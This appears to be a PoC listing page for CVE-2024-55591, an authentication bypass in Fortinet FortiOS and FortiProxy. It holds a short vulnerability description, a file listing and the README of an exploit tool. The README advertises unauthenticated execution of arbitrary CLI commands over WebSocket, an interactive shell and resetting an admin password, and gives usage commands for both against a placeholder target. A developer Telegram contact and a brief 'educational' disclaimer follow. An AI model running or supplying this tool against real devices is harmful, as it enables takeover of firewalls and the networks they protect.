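PoC details: 781e843d45baa2c9db1a41fbe4052a3f1516a9dc

Source
Related vulnerability
Title: Fortinet FortiOS and FortiProxy security vulnerability (CVE-2024-55591)
Description: Fortinet FortiOS and Fortinet FortiProxy are both products of the US company Fortinet. Fortinet FortiOS is a security operating system dedicated to the FortiGate network security platform. It provides users with security features such as firewall, antivirus, IPSec/SSL VPN, web content filtering and anti-spam. Fortinet FortiProxy is a secure web proxy that protects employees against network attacks by combining multiple detection techniques, such as web filtering, DNS filtering, DLP, antivirus, intrusion prevention and advanced threat protection. FortiProxy helps reduce
Introduction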

# CVE-2024-55591 – FortiOS WebSocket CLI Auth Bypass (PoC)

This is a Proof-of-Concept (PoC) tool for exploiting **CVE-2024-55591**, a vulnerability in FortiOS that allows unauthenticated access to the CLI over WebSocket.

## Features

- Automatic detection of FortiOS GUI and vulnerability status
- Execute arbitrary CLI commands via WebSocket
- Interactive shell interface
- Admin password reset functionality (`--reset-user`)
- SSL support

## Usage

### Basic interactive mode:

```bash
python3 poc.py --host <target_ip> --port 443 --ssl
```

Then use the prompt:

```
FortiOS# get system status
FortiOS# exit
```

### Reset admin password:

```bash
python3 poc.py --host <target_ip> --port 443 --ssl \
  --reset-user Admin2 --new-pass Forti2024!
```

## Developer

- Telegram: [@cherny_zhizn](https://t.me/cherny_zhizn)

---

**Disclaimer:** This tool is provided for educational and authorized testing purposes only.
File snapshot

[4.0K] /data/pocs/781e843d45baa2c9db1a41fbe4052a3f1516a9dc
├── [6.3K] CVE 2024 55591 PoC.py
├── [1.2K] LICENSE
└── [1.0K] README.md

0 directories, 3 files